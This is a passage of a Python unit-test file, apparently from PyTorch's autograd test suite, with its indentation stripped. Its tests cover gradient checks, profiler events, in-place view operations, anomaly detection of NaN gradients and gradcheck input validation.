gradgradcheck(lambda A: func(k, A, largest), A, [D_grad, U_grad], atol=1e-4, check_batched_grad=False)
# check whether A.grad is symmetric
A = A.detach().requires_grad_(True)
D, U = func(k, A, largest)
(D.sum() + U.sum()).backward()
self.assertEqual(A.grad, A.grad.mT)
for largest in [True, False]:
run_symeig_test(1, (6, 6), largest=largest)
run_symeig_test(1, (2, 6, 6), largest=largest)
run_symeig_test(1, (2, 2, 6, 6), largest=largest)
run_symeig_test(2, (6, 6), largest=largest)
run_symeig_test(2, (2, 6, 6), largest=largest)
run_symeig_test(2, (2, 2, 6, 6), largest=largest)
run_symeig_test(3, (9, 9), largest=largest)
run_symeig_test(3, (2, 9, 9), largest=largest)
run_symeig_test(3, (2, 2, 9, 9), largest=largest)
def test_variable_traverse(self):
def get_out_and_unrefed_cycle():
inp = torch.randn(10, requires_grad=True)
tmp = inp.view(10, 1)
out = tmp.view(10)
# Create a reference cycle that contains an
# intermediary Variable in the graph
my_list = []
my_list.append(tmp)
my_list.append(my_list)
return out
out = get_out_and_unrefed_cycle()
gc.collect()
# This will segfault if things have been erroneously released
out.backward(torch.randn(out.size()))
# TODO: review porting these to OpInfo tests
def test_pow_zero_tensor_gradient(self):
def run_test(input_size, exponent):
input = torch.zeros(*input_size, requires_grad=True)
input.pow(exponent).sum().backward()
self.assertEqual(input.grad.abs().sum(), 0)
run_test((10,), torch.zeros(10))
run_test((10, 10), torch.zeros(10, 10))
run_test((10,), 0)
def test_profiler(self):
x = torch.randn(10, 10)
with profile(use_kineto=kineto_available()) as p:
self.assertTrue(torch.autograd._profiler_enabled())
y = x * 2 + 4
self.assertFalse(torch.autograd._profiler_enabled())
names = ['aten::mul', 'aten::add']
found_indices = set()
for evt in p.function_events:
if evt.name in names:
found_indices.add(names.index(evt.name))
self.assertEqual(len(found_indices), len(names))
def test_profiler_seq_nr(self):
with profile(use_kineto=kineto_available()) as p:
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=True)
z = x + y
s = z.sum()
s.backward()
print(p.key_averages().table(
sort_by="self_cpu_time_total", row_limit=-1))
# expecting aten::add, aten::sum to have the sequence numbers,
# expecting the corresponding backward nodes to have the same numbers
# as the forward ops
add_seq_nr = -1
sum_seq_nr = -1
found_add = found_sum = False
found_bwd_add = found_bwd_sum = False
found_empty = False
for e in p.function_events:
# Ignore record_function user scope.
if "autograd::engine::evaluate_function" in e.name:
continue
if e.name == "aten::add":
add_seq_nr = e.sequence_nr
self.assertFalse(found_add)
found_add = True
elif e.name == "aten::sum":
sum_seq_nr = e.sequence_nr
self.assertFalse(found_sum)
found_sum = True
elif "Add" in e.name and "Backward" in e.name:
self.assertEqual(e.sequence_nr, add_seq_nr)
self.assertFalse(found_bwd_add)
found_bwd_add = True
elif "Sum" in e.name and "Backward" in e.name:
self.assertEqual(e.sequence_nr, sum_seq_nr)
self.assertFalse(found_bwd_sum)
found_bwd_sum = True
# check that nested ops (e.g. empty) don't have
# a sequence number
if e.name == "aten::empty":
self.assertEqual(e.sequence_nr, -1)
found_empty = True
self.assertGreaterEqual(add_seq_nr, 0)
self.assertGreaterEqual(sum_seq_nr, 0)
self.assertNotEqual(add_seq_nr, sum_seq_nr)
self.assertTrue(found_add)
self.assertTrue(found_sum)
self.assertTrue(found_bwd_add)
self.assertTrue(found_bwd_sum)
self.assertTrue(found_empty)
def test_profiler_unboxed_only(self):
x = torch.rand(3, 4)
with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
x.resize_([3, 2])
def test_profiler_propagation(self):
def foo(x):
with record_function("in_foo") as rf:
return x * 2
x = torch.rand(3, 4)
traced_foo = torch.jit.trace(foo, x)
def bar(x):
with record_function("in_bar") as rf:
# we expect that the profiler will be able to
# propagate across the fork
fut = torch.jit._fork(traced_foo, x)
y = torch.jit._wait(fut)
# note: continuation (and rf's end) can
# be executed in a different thread
with record_function("in_bar_after_wait") as rf2:
y = y * 2
return y
traced_bar = torch.jit.trace(bar, x)
with profile(use_kineto=kineto_available()) as p:
traced_bar(x)
found_foo = False
found_bar = False
found_bar_after_wait = False
for info in p.function_events:
if info.name == "in_foo":
self.assertFalse(found_foo)
found_foo = True
elif info.name == "in_bar":
self.assertFalse(found_bar)
found_bar = True
elif info.name == "in_bar_after_wait":
self.assertFalse(found_bar_after_wait)
found_bar_after_wait = True
self.assertTrue(found_foo)
self.assertTrue(found_bar)
self.assertTrue(found_bar_after_wait)
def test_record_function_callbacks(self):
x = torch.randn(10, 10)
with profile(use_kineto=kineto_available()) as p:
with record_function("foo"):
y = x * 2 + 4
function_events = p.function_events
foo_event = [event for event in function_events if "foo" in event.name][0]
self.assertEqual(foo_event.count, 1)
def test_profiler_aggregation_fake(self):
events = EventList()
id = [0]
def get_id():
id[0] = id[0] + 1
return id[0]
# [[thread_id, [(start, end, id), ....]], ...]
# Using list instead of a dict so order is guaranteed for any Python
# version
threads = [
[1, [(0, 1, get_id()), (1, 2, get_id())]],
[0, [(0, 2, get_id()), (1, 2, get_id()), (1, 3, get_id())]],
]
for thread, ranges in threads:
for range in ranges:
assert len(range) == 3
events.append(
FunctionEvent(
id=range[2],
node_id=0,
name="",
thread=thread,
start_us=range[0],
end_us=range[1],
)
)
events._populate_cpu_children()
# Note that [1, 3] pushes out [0, 2] first. Then we record [1, 2]
# as a child of [1, 3]
res = [[], [], [], [], [4]]
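# res[i] lists the expected child ids of events[i]: only [1, 3] (id 5) gets a child,
# [1, 2] (id 4), because [0, 2] (id 3) has already been popped when [1, 2] is processed.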
def get_children_ids(event):
return [child.id for child in event.cpu_children]
assert [get_children_ids(event) for event in events] == res
def test_profiler_aggregation_table(self):
"""
Test if the profiling result is aggregated for `str(prof)`
See: https://github.com/pytorch/pytorch/issues/37500
"""
x = torch.randn(1024)
with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
torch.einsum("i->", x)
prof_str = str(prof)
prof_table = prof.table()
self.assertEqual(prof_table, prof_str)
def test_profiler_function_event_avg(self):
avg = FunctionEventAvg()
avg.add(FunctionEvent(id=0, node_id=0, name="foo", thread=0, start_us=10, end_us=15))
avg.add(FunctionEvent(id=1, node_id=0, name="foo", thread=0, start_us=20, end_us=30))
avg.add(avg)
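# The two events last 5us and 10us; adding the accumulator to itself doubles the
# aggregate stats (count 2 -> 4, cpu_time_total 15 -> 30), so cpu_time is 30 / 4 == 7.5.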
self.assertEqual(avg.key, "foo")
# aggregate stats
self.assertEqual(avg.count, 4)
self.assertEqual(avg.cpu_time_total, 30)
self.assertEqual(avg.self_cpu_time_total, 30)
self.assertEqual(avg.cuda_time_total, 0)
# average stats
self.assertEqual(avg.cpu_time, 7.5)
self.assertEqual(avg.cuda_time_total, 0)
def test_profiler_shapes(self):
print("")
layer1 = torch.nn.Linear(20, 30)
layer2 = torch.nn.Linear(30, 40)
input = torch.randn(128, 20)
with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
layer2(layer1(input))
print(prof.function_events)
linear_expected_shapes = [
[[128, 20], [30, 20], [30]],
[[128, 30], [40, 30], [40]],
]
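# Each entry is the (input, weight, bias) shape list recorded for one aten::linear call.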
found_indices = set()
for event in prof.function_events:
if event.name == "aten::linear":
self.assertTrue(event.input_shapes in linear_expected_shapes)
found_indices.add(linear_expected_shapes.index(event.input_shapes))
self.assertEqual(len(found_indices), len(linear_expected_shapes))
def test_profiler_aggregation_lstm(self):
print("")
rnn = torch.nn.LSTM(10, 20, 2)
total_time_s = 0
with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
for i in range(20):
input = torch.randn(5, 3, 10)
h = torch.randn(2, 3, 20)
c = torch.randn(2, 3, 20)
start = time.time()
rnn(input, (h, c))
end = time.time()
total_time_s += end - start
print(prof.table(
sort_by="self_cpu_time_total", row_limit=10, header="TEST"))
print(prof.key_averages(group_by_input_shape=True).table(
sort_by="self_cpu_time_total", row_limit=10))
print(prof.table(
sort_by="self_cpu_time_total", row_limit=10, max_src_column_width=300, header="TEST", top_level_events_only=True))
print(prof.key_averages(group_by_input_shape=True).table(
sort_by="self_cpu_time_total", row_limit=10, top_level_events_only=True))
total_time_us = total_time_s * 1000.0 * 1000.0  # convert to microseconds, the profiler's default unit
print(
"Total time based on python measurements: ",
_format_time(total_time_us)
)
print(
"CPU time measurement python side overhead: {:.2f}%".format(
(total_time_us / prof.self_cpu_time_total - 1.0) * 100.0
)
)
if sys.platform != "win32":
with tempfile.NamedTemporaryFile() as trace_file:
prof.export_chrome_trace(trace_file.name)
def test_record_function(self):
x = torch.randn(10, 10)
def forward(x):
with record_function("outer"):
y = x * 2 + 4
with record_function("inner"):
y = y - 1
y = y / 1
forward(x)
with profile(use_kineto=kineto_available()) as p:
forward(x)
events = p.function_events
important_events = [
'outer',
'aten::mul',
'aten::add',
'inner',
'aten::sub',
'aten::div'
]
idx = 0
for info in events:
if info.name == important_events[idx]:
idx = idx + 1
if idx == len(important_events):
break
self.assertEqual(idx, len(important_events))
# We can also use record_function to decorate an arbitrary function
@record_function('my_func')
def f(x, y):
return x + y
with profile(use_kineto=kineto_available()) as p:
f(1, 2)
self.assertTrue('my_func' in str(p))
def test_record_function_multithreaded(self):
rf = record_function("outer")
rf.__enter__()
with record_function("inner"):
# test that exiting the record function after starting another one
# doesn't throw.
rf.__exit__(None, None, None)
with record_function("inner"):
rf.__enter__()
# test that exiting the record function after ending another one
# doesn't throw.
rf.__exit__(None, None, None)
def test_dir(self):
x = torch.randn(10, 10)
keys = dir(x)
self.assertIn('shape', keys)
# real and imag are only implemented for complex tensors.
y = torch.randn(10, 10, dtype=torch.cfloat)
imag_key = 'imag'
self.assertRaises(RuntimeError, lambda: hasattr(x, imag_key))
self.assertTrue(hasattr(y, imag_key))
keys.remove(imag_key)
for key in keys:
self.assertTrue(hasattr(x, key))
def test_inplace_on_view_saved_output(self):
# Test an in-place operation on a view in which the in-place op saves
# its output. Previously, this created a reference cycle.
dealloc = [0]
class IncrementOnDelete(object):
def __del__(self):
dealloc[0] += 1
def test():
root = torch.randn(3, 3, requires_grad=True)
copy = root.clone()
copy.grad_fn.register_hook(IncrementOnDelete())
view = copy.view(9)
torch.nn.functional.relu(view, inplace=True)
test()
self.assertEqual(dealloc[0], 1)
def test_inplace_on_view_leaf_errors(self):
# Issue #21875: Fail faster (when we try to modify the view vs. in backward())
x = torch.zeros(1, requires_grad=True)
y = x.view_as(x)
with self.assertRaisesRegex(RuntimeError,
"a view of a leaf Variable that "
"requires grad is being used in "
"an in-place operation."):
y.add_(1)
def test_inplace_on_view_backward(self):
# Issue #10532: Make sure that this does not raise RuntimeError.
net = nn.Sequential(
nn.InstanceNorm2d(2),
nn.ReLU(True)
)
x = torch.tensor([[[[1.0, 1.0]]]], requires_grad=True)
g, = torch.autograd.grad(net(x).pow(2), [x], grad_outputs=x.new_ones(x.shape) , create_graph=True)
torch.autograd.grad(g.sum(), [x])
self.assertEqual(x, torch.tensor([[[[1.0, 1.0]]]]))
# https://discuss.pytorch.org/t/freeing-buffer-strange-behavior/31955/8
inputs = torch.ones((1, 3, 256, 256), requires_grad=True)
tmp1 = (inputs + 1).view_as(inputs)
tmp2 = torch.nn.functional.threshold(tmp1, 0., 0., True)
prob_interpolated = torch.sigmoid(tmp2)
gradients = torch.autograd.grad(outputs=prob_interpolated, inputs=inputs,
grad_outputs=torch.ones(prob_interpolated.size()),
create_graph=True, retain_graph=True)[0]
gradient_penalty = gradients.sum()
gradient_penalty.backward()
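# Walk two hops down the double-backward graph to reach the node created by
# differentiating the in-place threshold a second time.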
fn = gradient_penalty.grad_fn.next_functions[0][0].next_functions[1][0]
self.assertEqual(fn.name(), "ThresholdBackwardBackward0")
def test_inplace_on_view_weak_grad_fn(self):
# Issue 23502: Test that b's grad_fn is preserved.
a = torch.arange(10.0, requires_grad=True)
b = a.narrow(0, 0, 2).clone().view(-1)
b.relu_()
c = b.clone()
del b
gc.collect()
s = c.sum()
s.backward()
self.assertEqual(s, torch.tensor(1.0))
# Issue #21875: Fail faster (when we try to modify the view vs. in backward())
a = torch.rand(10, requires_grad=True).narrow(0, 0, 10)
with self.assertRaises(RuntimeError):
b = a.relu_()
def test_out_variant_raises_when_inputs_require_grad(self):
a = torch.randn(2, 2, requires_grad=True)
b = torch.randn(2, 2, requires_grad=True)
x = torch.zeros_like(a)
# out=... functions don't support automatic differentiation currently
self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x))
# the inputs can require grad if we're in no_grad() mode
with torch.no_grad():
torch.mul(a, b, out=x)
self.assertEqual(x, a * b)
a = torch.randn(2, 2)
b = torch.randn(2, 2)
x = torch.zeros(2, 2, requires_grad=True)
# we should throw an exception if the output requires grad
self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x))
# TODO: see if this test can be OpInfo'd or moved to diagonal's test suite
def test_diagonal_derivative_requires_grad(self):
# Test that the backward requires grad.
# We do this because diagonal_backward uses in-place
# operations and gradgradcheck does not catch whether
# they work as expected (it will succeed even if
# the gradient has requires_grad == False).
a = torch.randn(5, 6, requires_grad=True)
b = torch.diagonal(a)**2
c = b.sum()
d, = torch.autograd.grad(c, a, retain_graph=True, create_graph=True)
self.assertTrue(d.requires_grad)
def test_anomaly_detect_nan(self):
size = 10
class MyFunc(Function):
@staticmethod
def forward(ctx, inp1, inp2, fail_0th):
ctx.fail_0th = fail_0th
return inp1.sum(0, keepdim=True)
@staticmethod
def backward(ctx, gO):
gI = gO.clone().expand(size)
gI[0] = 0
gI[0] /= 0 # Generate a nan
if ctx.fail_0th:
return gI, None, None
else:
return None, gI, None
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, inp, True)
out.backward() # Should not fail
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, inp, True)
with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 0th output."):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
out.backward()
self.assertIn('No forward pass information', str(w[0].message))
inp = torch.rand(size, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 1th output."):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
out = MyFunc.apply(inp, inp, False)
out.backward()
self.assertIn('MyFunc.apply', str(w[0].message))
def test_nested_anomaly_detect_nan(self):
size = 10
class MyFunc(Function):
@staticmethod
def forward(ctx, inp1, fail_0th):
ctx.fail_0th = fail_0th
ctx.save_for_backward(inp1)
return inp1.sum(0, keepdim=True)
@staticmethod
def backward(ctx, gO):
inp, = ctx.saved_tensors
fail_0th = ctx.fail_0th
g = gO.clone().expand(size)
gI = MyFunc2.apply(g * inp, g + inp, fail_0th)
return gI, None
class MyFunc2(Function):
@staticmethod
def forward(ctx, inp1, inp2, fail_0th):
ctx.fail_0th = fail_0th
return inp1 * 2.0 + inp2
@staticmethod
def backward(ctx, gO):
fail_0th = ctx.fail_0th
g1 = gO.clone()
g2 = gO.clone()
g1[0] = 0
g2[0] = 0
# generate a nan
if fail_0th:
g1[0] /= 0
else:
g2[0] /= 0
return g1, g2, None
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, True)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
gsum.backward() # should not fail
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, True)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
with detect_anomaly():
gsum.backward()
self.assertIn('No forward pass information', str(w[1].message))
inp = torch.rand(size, requires_grad=True)
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 1th output."):
with detect_anomaly():
out = MyFunc.apply(inp, False)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
gsum.backward()
self.assertIn('MyFunc2.apply', str(w[1].message))
self.assertIn('MyFunc.apply', str(w[2].message))
def test_anomaly_grad_warnings(self):
# PyTorch won't throw warnings if there is an error
# but we'd want to at least see them in stderr
class StdErrDiverter:
def __enter__(self):
self.stderr_orig = sys.stderr
self.stderr_new = io.StringIO()
sys.stderr = self.stderr_new
return self
def __exit__(self, *args):
self.captured = self.stderr_new.getvalue()
sys.stderr = self.stderr_orig
# if the warnings don't throw, they will be handled as regular warnings
with self.assertRaisesRegex(RuntimeError,
"one of the variables needed for gradient computation has been "
"modified by an inplace operation"):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
a = torch.randn(5, requires_grad=True)
d1 = a + 1
d2 = d1 ** 2
d1 += 1
torch.autograd.grad(d2.sum(), a)
self.assertEqual(len(w), 2)
self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
self.assertIn('Error detected in PowBackward0', str(w[1].message))
# if the warning throws, it will be printed to sys.stderr
with self.assertRaisesRegex(RuntimeError,
"one of the variables needed for gradient computation has been "
"modified by an inplace operation"):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
warnings.simplefilter("error")
with StdErrDiverter() as s:
a = torch.randn(5, requires_grad=True)
d1 = a + 1
d2 = d1 ** 2
d1 += 1
torch.autograd.grad(d2.sum(), a)
self.assertEqual(len(w), 1)
self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
self.assertIn('Error detected in PowBackward0', s.captured)
def test_anomaly_assign_parent_cleanup(self):
# Test that python objects created are properly cleaned up when assign_parent is called
import weakref
def get_ref():
# we use torch.exp here but any function that will construct a new node in its
# backward call in grad mode will work
x = torch.randn(2, 2, requires_grad=True)
t = x.exp()
# ExpBackward calls mul, creating the MulBackward node when create_graph=True.
# In anomaly mode, a PyObject referencing MulBackward's "parent" ExpBackward is added to
# MulBackward's anomaly metadata dict, creating the following reference chain:
#
# grad -> MulBackward -> PyObject -> ExpBackward
#
with detect_anomaly():
grad = torch.autograd.grad(t, x, torch.ones_like(t), create_graph=True)
# We add a weak reference to a new Foo object, which we insert into ExpBackward's metadata dict
#
# (PyObject) -> ExpBackward -> dict -> *Foo*
# t ----^ WeakRef ---^
#
# We want to test that, when grad goes out of scope at the end of this function, that PyObject is destroyed
# We can test this by checking that Foo is not kept alive once t is destroyed
class Foo(object):
pass
my_obj = Foo()
meta_dict = t.grad_fn.metadata
meta_dict[0] = my_obj
ref = weakref.ref(my_obj)
return t, ref
t, ref = get_ref()
self.assertIsNotNone(ref())
del t
self.assertIsNone(ref())
def test_nested_anomaly_printstack_cleanup(self):
# Test if metadata dict PyObject is properly destroyed
import weakref
def get_ref():
# This is similar to the construction in test_anomaly_assign_parent_cleanup:
#
# MyFuncBackward2 -> PyObject -> MyFuncBackward -> dict -> Foo
# out ---^ WeakRef ---^
#
# We want to check that Foo is still properly destroyed even when MyFunc2Backward's
# AnomalyMetadata calls printstack, which does some python object manipulation.
#
# You might be wondering why we still need test_anomaly_assign_parent_cleanup,
# since if the PyObject were not destroyed here, wouldn't this test detect that as well?
# The answer is that the custom function's PyObject (THPFunction) actually only holds
# a weak reference to the C++ node!
class MyFunc(Function):
@staticmethod
def forward(ctx, x):
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, gO):
x, = ctx.saved_tensors
return MyFunc2.apply(x)
class MyFunc2(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, gO):
return gO + float("NaN")
inp = torch.rand(1, requires_grad=True)
out = MyFunc.apply(inp)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
with detect_anomaly():
ginp.backward()
class Foo(object):
pass
my_obj = Foo()
meta_dict = out.grad_fn.metadata
meta_dict[0] = my_obj
ref = weakref.ref(my_obj)
return out, ref
t, ref = get_ref()
self.assertIsNotNone(ref())
del t
self.assertIsNone(ref())
# TODO: update these tests to use the linalg module and move to test_linalg.py
@skipIfNoLapack
def test_eig_no_eigenvectors(self):
A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
w, v = torch.eig(A, eigenvectors=False)
with self.assertRaisesRegex(RuntimeError, 'is not differentiable'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_eig_complex_eigenvalues(self):
A = torch.tensor([[0., -1.], [1., 0.]], dtype=torch.float32, requires_grad=True)
w, v = torch.eig(A, eigenvectors=True)
with self.assertRaisesRegex(RuntimeError, 'does not support complex eigenvalues'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_symeig_no_eigenvectors(self):
A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
w, v = torch.symeig(A, eigenvectors=False)
with self.assertRaisesRegex(RuntimeError, 'is not differentiable'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
def test_no_grad_copy(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad.data_ptr()
return grad, grad
class NonContGradFunc(Function):
@staticmethod
def forward(ctx, inp1):
ctx.size = inp1.size()
return torch.tensor([1.])
@staticmethod
def backward(ctx, grad):
return torch.ones(1).expand(ctx.size)
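# expand() returns a stride-0, non-contiguous view, so the grads accumulated
# below cannot simply alias it (see the data_ptr checks).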
a = torch.randn(5, 6, requires_grad=True)
b = torch.randn(5, 6, requires_grad=True)
# non-contiguous grad should be copied
NonContGradFunc.apply(MyFunc.apply(a, b)).backward()
self.assertFalse(a.grad.data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(b.grad.data_ptr() == MyFunc.static_grad_ptr)
# test case that should trigger no copy for one of a,b
a.grad = b.grad = None
MyFunc.apply(a, b)[1][0].backward()
p_g = MyFunc.static_grad_ptr
p_a = a.grad.data_ptr()
p_b = b.grad.data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# check one of them is using the computed buffer
self.assertTrue(p_a == p_g or p_b == p_g)
def test_no_grad_copy_sparse(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad._values().data_ptr()
return grad, grad
class NonContGradFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
# Create a sparse tensor with non-contiguous indices and values
# and return it as the grad.
v = torch.rand(1, 3)
i = torch.ones(1, 1, dtype=torch.long)
nv = v.expand(8, 3)
ni = i.expand(1, 8)
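# Both ni and nv are stride-0 expanded views, i.e. non-contiguous.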
ngrad = torch.sparse.FloatTensor(ni, nv, torch.Size([10, 3]))
NonContGradFunc.static_grad_ptr = ngrad._values().data_ptr()
return ngrad, ngrad
a = torch.randn(10, 3, requires_grad=True)
b = torch.randn(10, 3, requires_grad=True)
input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.tensor([0, 4])
import torch.nn.functional as F
# test case that should trigger no copy for one of a,b
emb_matrix = MyFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
loss.backward(retain_graph=True)
p_g = MyFunc.static_grad_ptr
p_a = a.grad._values().data_ptr()
p_b = b.grad._values().data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# check one of them is using the computed buffer
self.assertTrue(p_a == p_g or p_b == p_g)
# Run backwards multiple times to ensure accumulation works.
for i in range(10):
loss.backward(retain_graph=True)
# With non-contiguous indices and values, we should trigger a copy.
a.grad = b.grad = None
emb_matrix = NonContGradFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
loss.backward(retain_graph=True)
p_g = NonContGradFunc.static_grad_ptr
p_a = a.grad._values().data_ptr()
p_b = b.grad._values().data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# Verify we cloned both grads.
self.assertFalse(p_a == p_g)
self.assertFalse(p_b == p_g)
# Run backwards multiple times to ensure accumulation works.
for i in range(10):
loss.backward(retain_graph=True)
def test_gradcheck_single_input(self):
def check(fast_mode):
def f(inp):
return inp.mul(5)
gradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
gradgradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_sparse_input(self):
def check(fast_mode):
def fn(sparse):
return torch.sparse.sum(sparse)
gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=True,
check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'gradcheck expects all tensor inputs are dense'):
gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=False,
check_batched_grad=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_nondeterministic(self):
class NonDetFunc(Function):
@staticmethod
def forward(ctx, x, jitter=0.0):
ctx._jitter = jitter
return x
@staticmethod
def backward(ctx, grad_out):
return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None
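# With jitter == 0 the backward is exact; otherwise each call scales the gradient
# by a fresh random factor in [1, 1 + jitter], so repeated backward passes disagree
# unless nondet_tol is at least of that order.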
def check(fast_mode):
inp = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, check_batched_grad=False, fast_mode=fast_mode)
gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_validates_inputs(self):
def check(fast_mode):
# when inputs are not dense, but check_sparse_nnz is false
x = torch.rand(10, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'dense when check_sparse_nnz is set to False.'):
gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False, check_batched_grad=False,
fast_mode=fast_mode)
self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False,
check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))
# when none of the inputs require grad (always raises even if raise_exception=False)
x = torch.rand(10, requires_grad=False)
with self.assertRaisesRegex(ValueError, 'at least one input tensor to require gradient'):
gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)
# (warning) when inputs are not double precision
x = torch.ones(1, dtype=torch.float32, requires_grad=True)
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
self.assertTrue(gradcheck(lambda x: x, (x,), atol=1e-1, fast_mode=fast_mode))
# when layout is not mkldnn (i.e. has strides) and the input has a dimension with stride 0 (always raises
# even if raise_exception=False)
x = torch.ones(1, dtype=torch.float64, requires_grad=True)
x = x.expand((2, 2))
with self.assertRaisesRegex(RuntimeError, 'The 0th input has a dimension with stride 0'):
gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_validates_input_mkldnn(self):
# forward mode testing is not allowed for mkldnn inputs
# Tolerances below are loosened to make sure the gradients match even in single precision floats
# Use the warning assert to hide the float32 warning
x = torch.ones(1).to_mkldnn().requires_grad_()
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
with self.assertRaisesRegex(ValueError, 'MKLDNN inputs are not support for forward AD gradcheck.'):
gradcheck(lambda x: x.to_dense(), (x,), raise_exception=False, fast_mode=False, check_forward_ad=True,
atol=1e-1, rtol=1e-1)
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
with self.assertRaisesRegex(ValueError, 'MKLDNN inputs are not support for forward AD gradcheck.'):
gradcheck(lambda x: x.to_dense(), (x,), raise_exception=False, fast_mode=True, check_forward_ad=True,
atol=1e-1, rtol=1e-1)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_test_outputs(self):
def check(fast_mode):
# when outputs are sparse (always raises even if raise_exception=False)
x = torch.rand(10, requires_grad=True).to_sparse()
with self.assertRaisesRegex(ValueError, 'Sparse output is not supported at gradcheck yet'):
gradcheck(lambda x: x, (x,), check_sparse_nnz=True, check_batched_grad=False, raise_exception=False,
fast_mode=fast_mode)
# when outputs are mkldnn (always raises even if raise_exception=False)
root = torch.randn(4, 5, dtype=torch.float32, requires_grad=True)
with self.assertRaisesRegex(ValueError, 'MKLDNN output is not supported at gradcheck yet'):
gradcheck(lambda x: x.to_mkldnn(), (root,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode)
check(fast_mode=True)
